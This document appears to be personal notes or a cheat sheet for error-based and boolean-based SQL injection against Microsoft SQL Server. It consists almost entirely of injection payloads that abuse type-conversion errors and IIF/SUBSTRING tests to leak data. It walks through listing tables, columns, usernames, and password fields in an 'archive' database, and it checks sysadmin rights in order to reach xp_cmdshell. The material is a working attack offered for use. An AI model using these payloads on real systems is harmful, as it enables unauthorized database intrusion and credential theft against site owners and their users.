'+convert(id,db_name())+' ERROR
'+convert(char,db_name())+' OK
'+convert(char,(SELECT IIF(SUBSTRING(DB_NAME(),1,1)='A',3,@@VERSION)))+'
This query was working as this:
Sub-stringing the database name starting from 1st character within 1 length and comparing within ‘A’ character whether it equals or not.
If that character equals to ‘A’, then it returns 3 as integer.
Converting ‘3’ as integer to char is successful and returns without any errors, meaning that the query is true.
If the character does not equal to ‘A’, then it returns @@VERSION as T-SQL functionality.
Converting @@VERSION result to char is not successful and returns error (Error.aspx page), meaning that the query is false!
'+convert(char,(SELECT IIF(SUBSTRING(HOST_NAME(),1,1)='A',3,@@VERSION)))+'
Microsoft SQL Server 2017 (RTM)
%2bconvert(char,(SELECT IIF(SUBSTRING((***query_here***),1,1)='d',3,@@VERSION)))%2b
'+convert(char,(SELECT IIF(SUBSTRING((select top 1 table_name from INFORMATION_SCHEMA.tables),1,1)='A',3,@@VERSION)))+'
'+convert(int,(user_name()))+' - testuser
'+(SELECT CASE WHEN (is_srvrolemember('sysadmin', 'testuser')=0) THEN 1/0 ELSE NULL END)+' - Nope
'+(SELECT CASE WHEN (is_srvrolemember('sysadmin')=1) THEN 1/0 ELSE NULL END)+' - True
:( - If it is equal to 1, we can execute xp_cmdshell command. So we can not execute the command anyways.
'+(convert(int,(select top 1 table_name from information_schema.tables)))+'
The above query will retrieve the top table_name from the database.
Conversion failed when converting the nvarchar value 'users' to data type int.
Got a good table if not,
convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Download_Document','login_audit')))
- Keep going find a proper table name
'+convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))+'
'+convert(int,(select top 1 column_name from information_schema.columns where column_name not in ('col1','col2','col3')))+'
'+convert(int,(select top 1 username from users))+'
'+convert(int,(select top 1 username from users where username not in ('user1','user2'')))+'
Different Approach
'+convert(int,(SELECT top 1 DB_NAME(6)))+'
'+convert(int,(SELECT top 1 DB_NAME(6)))+'
Getting other db - DB_NAME(i) 0<i<7(To get no error)
'+convert(int,(Select top 1 name from archive..syscolumns))+'
'+convert(int,(Select top 1 name from archive..syscolumns where name
not in ('alogin','id','psw')))+'
'+convert(int,(SELECT top 1 alogin FROM archive..pmanager where alogin
'+convert(int,(SELECT top 1 psw FROM archive..pmanager where psw not in
'+convert(int,(select top 1 column_name from archive..pmanager.alogin))+'